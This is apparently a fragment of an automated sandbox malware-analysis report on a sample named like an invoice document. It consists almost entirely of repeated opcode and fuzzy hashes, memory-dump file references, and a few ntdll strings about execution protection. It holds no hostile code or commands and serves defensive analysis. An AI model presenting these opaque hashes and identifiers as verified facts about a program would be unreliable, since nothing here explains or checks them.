                                                                                                                                • Opcode Fuzzy Hash: 8bfb67d5f7a1272fa2c85d23f381115aba095f3cb7d27e387c8cabf60744d21d
                                                                                                                                • Instruction Fuzzy Hash: 7BF0B4719967D5DFE733DB6CC444B21FBD49B01621F084DAAD74B875C2C7A4DA80C650
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4f59956a3124348153c79cf22094b4d14d36109e356d89754b905379ccf96f28
                                                                                                                                • Instruction ID: 5ccd9cd67484830c00e09b31cb87b58aedf807e95cd2f0600371397d1e3db2d7
                                                                                                                                • Opcode Fuzzy Hash: 4f59956a3124348153c79cf22094b4d14d36109e356d89754b905379ccf96f28
                                                                                                                                • Instruction Fuzzy Hash: 3FF0272E41A6808BCF329B2C68983DAEB55E781A24F09144DF4A057209C6748883C3A0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                • Instruction ID: 256854034d77f7f447e8df7dbcc6ce996f51a0422f30aed00a8087a426298d9a
                                                                                                                                • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                • Instruction Fuzzy Hash: 4BD0A7321045105BD732AA1CFC04FC373D8BB48730F050459B014C7054C360AC41C644
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                • Instruction ID: 94048e0b93da74e8e991617dd2967e0de8b545f4b7465df60e16a3bdcf9cb83c
                                                                                                                                • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                • Instruction Fuzzy Hash: 7FE0EC369507849BDF12DF5DC644F5AFBF9BB94B40F150458A1085B6A4CA24A900CB40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                • Instruction ID: 02213c4e2692f08c3edcfd2b50bd2bf239b60add3a225d367cfcff4392748a3a
                                                                                                                                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                • Instruction Fuzzy Hash: 00D0223221203093DB289A996C04F63B905EF80AA4F0A002C360E93904C1048C43C2E0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                • Instruction ID: 44300ac94241e301eb742e01b7cb94308cab649f64ef49fba913b480aee7793d
                                                                                                                                • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                • Instruction Fuzzy Hash: 10D012371D054DBBCB119F66DC01F957BA9E764BA0F444420B514875A0D63AE950D584
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 41c77e1f8aa1ca04c57b25831c7c794aac52b575c4a8a6655dbded060a702651
                                                                                                                                • Instruction ID: 6c3401eb6fb27d2dbdab912269dfdace2110b19d758ddf77deb6f2b198479195
                                                                                                                                • Opcode Fuzzy Hash: 41c77e1f8aa1ca04c57b25831c7c794aac52b575c4a8a6655dbded060a702651
                                                                                                                                • Instruction Fuzzy Hash: ECD0A930A05002CBDF2BEF08CA18E2EFBB0FB50A40F4004ACE700A2025E32ADD02CB00
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                • Instruction ID: d5677f1eed71fd4a38bc23dfd53e70e83a5399b2a8535804730f348fa6c4e665
                                                                                                                                • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                • Instruction Fuzzy Hash: D3C01232290648AFC712AE99CD01F02BBA9EBA8B50F000421F2048B6B0D631E820EA84
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                • Instruction ID: 8d335537376763a19074f62af8a8663f3d36513744647193e8168ecec227fc30
                                                                                                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                • Instruction Fuzzy Hash: F4D01236100248EFCB01DF41C890D9AB72AFBD8710F108019FD19076118A31ED63DA90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                • Instruction ID: 805a0907c37c8a13650b51a1cfbad4d0d16fb2ea3bbf77f7542ad6d795f24eec
                                                                                                                                • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                • Instruction Fuzzy Hash: F1C04879B01A428FCF16DB2ED298F49B7E4FB44750F150890E885CBB26EA64E941CA10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7f7ae473f60c81cd247e8552401d6b3681ea7b5c61c5fb67f11f9816c7f663fd
                                                                                                                                • Instruction ID: 9cead5fe6bd7fc936c7e768d0db3be0e3daa60532e23cd124813e3b2ef67b313
                                                                                                                                • Opcode Fuzzy Hash: 7f7ae473f60c81cd247e8552401d6b3681ea7b5c61c5fb67f11f9816c7f663fd
                                                                                                                                • Instruction Fuzzy Hash: 9A900231609800139380715948845468005A7E0301B55C021F4424564CCA648B565762
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 074717604b7bfd431eba5621f0deb1bee8e844431ee4357caee5130592d78f57
                                                                                                                                • Instruction ID: 54d23eb56e5ff0e6d2f58b7ac91b4adeadf4453def82454a9d70fec5615adafe
                                                                                                                                • Opcode Fuzzy Hash: 074717604b7bfd431eba5621f0deb1bee8e844431ee4357caee5130592d78f57
                                                                                                                                • Instruction Fuzzy Hash: E790026160550043438071594804406A005A7E1301395C125B4554570CC6688A55976A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c6716521a5d52d2981750959bacff41889e3446235d8f007ebf640beae847969
                                                                                                                                • Instruction ID: a22484a7e872a24d3e4b2c2702b006521a96cd3454b8f7ca3debbd6d6c4d56eb
                                                                                                                                • Opcode Fuzzy Hash: c6716521a5d52d2981750959bacff41889e3446235d8f007ebf640beae847969
                                                                                                                                • Instruction Fuzzy Hash: 7490023120540803D3C07159440464A400597D1301F95C025B4025664DCA658B597BA2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 88cff82712d9e3580d398209eedf883cb5cbe687a336222ae2a604425c6357b1
                                                                                                                                • Instruction ID: 1d01d54560db1581a57b247b7e420a136f68d06ee057f3019e52e7c48329efa3
                                                                                                                                • Opcode Fuzzy Hash: 88cff82712d9e3580d398209eedf883cb5cbe687a336222ae2a604425c6357b1
                                                                                                                                • Instruction Fuzzy Hash: DB90023120944843D38071594404A46401597D0305F55C021B40646A4DD6758F55BB62
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 722a10cec8ec09f7bcaa4c45ebe169580d97b34fe627027ddcfac2b39426337e
                                                                                                                                • Instruction ID: b0976bb76264072413cd2a1703d8193ee540345ea0092f169656a5d23bb2b5cc
                                                                                                                                • Opcode Fuzzy Hash: 722a10cec8ec09f7bcaa4c45ebe169580d97b34fe627027ddcfac2b39426337e
                                                                                                                                • Instruction Fuzzy Hash: 1690023160940803D39071594414746400597D0301F55C021B4024664DC7A58B557BA2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 57e0cc8ae8d893f2650ba9a54cee87d8c0c531cdf9b036bf2b7a9fc3eebbc42a
                                                                                                                                • Instruction ID: 36456be8d95ebca1d72ec4f73e5e18e5042fe1d4493fc5bbd120506acb6d7c05
                                                                                                                                • Opcode Fuzzy Hash: 57e0cc8ae8d893f2650ba9a54cee87d8c0c531cdf9b036bf2b7a9fc3eebbc42a
                                                                                                                                • Instruction Fuzzy Hash: 9290023120540803D34471594804686400597D0301F55C021BA024665ED6B58A917632
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ef026b62be4f6636cc9125397f82b97670be2704874d309da5925956d1bf3253
                                                                                                                                • Instruction ID: b642f597ec01e504d58edbd866321bc7744d5bb838a6f9e507aa42ddb51a342e
                                                                                                                                • Opcode Fuzzy Hash: ef026b62be4f6636cc9125397f82b97670be2704874d309da5925956d1bf3253
                                                                                                                                • Instruction Fuzzy Hash: F6900225225400030385B559060450B4445A7D6351395C025F54165A0CC6718A655722
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6d293462cdfa19e218e5a8ac75bc31da1c556b8b4701a70c2b561ba451c7772c
                                                                                                                                • Instruction ID: 41f545b83b9c9d7b724993038021517d4e7f63ffdf392a49ffddad84699acbaa
                                                                                                                                • Opcode Fuzzy Hash: 6d293462cdfa19e218e5a8ac75bc31da1c556b8b4701a70c2b561ba451c7772c
                                                                                                                                • Instruction Fuzzy Hash: 89900435315400030345F55D07045074047D7D5351355C031F5015570CD771CF715733
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 38178956b7d2db2e25d689a63941b97a1a371b1eac37484d4de3e8a480cdf26b
                                                                                                                                • Instruction ID: 5b73c8fe7a240e2d45be0a15140b676c511be460f3ef1e3425e8e5cf9a01935a
                                                                                                                                • Opcode Fuzzy Hash: 38178956b7d2db2e25d689a63941b97a1a371b1eac37484d4de3e8a480cdf26b
                                                                                                                                • Instruction Fuzzy Hash: DD9002A1205540934740B2598404B0A850597E0201B55C026F5054570CC5758A519636
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d19426fe86f3db1a9e5106b904ffe6c656bfe0b793246519f2bce19d8913f128
                                                                                                                                • Instruction ID: 2d8e60db51d69b0bf777af9912f59a7b2b7e1e18bf6ca9cc0bb2e2c9879af7dd
                                                                                                                                • Opcode Fuzzy Hash: d19426fe86f3db1a9e5106b904ffe6c656bfe0b793246519f2bce19d8913f128
                                                                                                                                • Instruction Fuzzy Hash: 9190022130540003D380715954186068005E7E1301F55D021F4414564CD9658A565723
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6855fe13e84e173e4d4957a8252dd4cd7fae4d57a0612667173798a0fa48f17b
                                                                                                                                • Instruction ID: 9efbf6402f16b3f431f5536df27f5e0916409d4943aaa255b2ee225e1eed087c
                                                                                                                                • Opcode Fuzzy Hash: 6855fe13e84e173e4d4957a8252dd4cd7fae4d57a0612667173798a0fa48f17b
                                                                                                                                • Instruction Fuzzy Hash: 8F90022921740003D3C07159540860A400597D1202F95D425B4015568CC9658A695722
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ab64b82ebfb0bc62fa774353b5fd1bd2662b2b27d8d2e65ed026a6521882338d
                                                                                                                                • Instruction ID: df9e281ce702b67e685ec2ef6ed2cec4bbe0ee0cbd9f38db3c2ddd6348a642f0
                                                                                                                                • Opcode Fuzzy Hash: ab64b82ebfb0bc62fa774353b5fd1bd2662b2b27d8d2e65ed026a6521882338d
                                                                                                                                • Instruction Fuzzy Hash: 0E90022120944443D34075595408A06400597D0205F55D021B50645A5DC6758A51A632
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 67e11e1bb1cd0389ee62df81dc3441cbacf9796341c2efbfe4d66e2db92c91de
                                                                                                                                • Instruction ID: 0365183d396c7f0bc696570e9b37cdfefa238d02d3ae539ada6174bf3800ff69
                                                                                                                                • Opcode Fuzzy Hash: 67e11e1bb1cd0389ee62df81dc3441cbacf9796341c2efbfe4d66e2db92c91de
                                                                                                                                • Instruction Fuzzy Hash: 50900221246441535785B15944045078006A7E0241795C022B5414960CC5769A56DB22
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f719cb160b7af3ae6b3df762d7526da5775f3f5e8cea8948cf6489c930ede3e5
                                                                                                                                • Instruction ID: 566f216b03de87e903a3dfa15c8a33d44eb4460fe75523b3ff8a034c4312e971
                                                                                                                                • Opcode Fuzzy Hash: f719cb160b7af3ae6b3df762d7526da5775f3f5e8cea8948cf6489c930ede3e5
                                                                                                                                • Instruction Fuzzy Hash: FB90023124540403D381715944046064009A7D0241F95C022B4424564EC6A58B56AF62
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 512f8e2781ea493f07fe5620cc37a99f3f2c7c28f4fb3e231302721e8cdc472b
                                                                                                                                • Instruction ID: 59353800194e113a284f259e5acd8fc7780be5f8e26e282a3b5fc0481d3bbc64
                                                                                                                                • Opcode Fuzzy Hash: 512f8e2781ea493f07fe5620cc37a99f3f2c7c28f4fb3e231302721e8cdc472b
                                                                                                                                • Instruction Fuzzy Hash: 6490023120540843D34071594404B46400597E0301F55C026B4124664DC665CA517A22
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 43bc3a8133051907d7b5283f1dd460d6e43226340f084aa67597a48a9f72b184
                                                                                                                                • Instruction ID: 9905c4433bd42113b079fee88582527a52a0c3cfa849cc95deb74ec145dba22e
                                                                                                                                • Opcode Fuzzy Hash: 43bc3a8133051907d7b5283f1dd460d6e43226340f084aa67597a48a9f72b184
                                                                                                                                • Instruction Fuzzy Hash: 2990023120540403D34071595508707400597D0201F55D421B4424568DD6A68A516622
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fe88fdf0958d5eefab202ce3e61571163b439d8aed3cdacbdf10d00b9c6e26ff
                                                                                                                                • Instruction ID: 1a8e12329ef04339acf0b0b32844e8ef961a1f64dcc1339fe5b9eb29ea7dfa5d
                                                                                                                                • Opcode Fuzzy Hash: fe88fdf0958d5eefab202ce3e61571163b439d8aed3cdacbdf10d00b9c6e26ff
                                                                                                                                • Instruction Fuzzy Hash: B290022160940403D38071595418706401597D0201F55D021B4024564DC6A98B556BA2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dfad4803dfd334016203d2be0067c6b14be3561ca4d2a3166aa4f89104346580
                                                                                                                                • Instruction ID: d089b35edce1718a02741f865d7cc7fbbe4e8a6f9ef8dd17d031b49e629d242c
                                                                                                                                • Opcode Fuzzy Hash: dfad4803dfd334016203d2be0067c6b14be3561ca4d2a3166aa4f89104346580
                                                                                                                                • Instruction Fuzzy Hash: A690023120540403D34075995408646400597E0301F55D021B9024565EC6B58A916632
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9d7d2c4d7f7472c721326450a95b36d0fb4583cb3265742b59a8f5e162141b0d
                                                                                                                                • Instruction ID: 801fba306861d52d9a1ffd6df7ce59b12a2d786c8c5dc1e5d48263fab6ff45e3
                                                                                                                                • Opcode Fuzzy Hash: 9d7d2c4d7f7472c721326450a95b36d0fb4583cb3265742b59a8f5e162141b0d
                                                                                                                                • Instruction Fuzzy Hash: 9390026121540043D34471594404706404597E1201F55C022B6154564CC5798E615626
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5f419346d4ebfa8f77589fc0ab79c20394fcf4f8dcd09c31fcaa928a51d418f2
                                                                                                                                • Instruction ID: 0e87141786ad33a06bb575cf773f146f42585b9fe10d1f375911aa7252f04fb1
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                Strings
                                                                                                                                • Execute=1, xrefs: 01774713
                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017746FC
                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01774655
                                                                                                                                • ExecuteOptions, xrefs: 017746A0
                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01774725
                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01774787
                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01774742
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
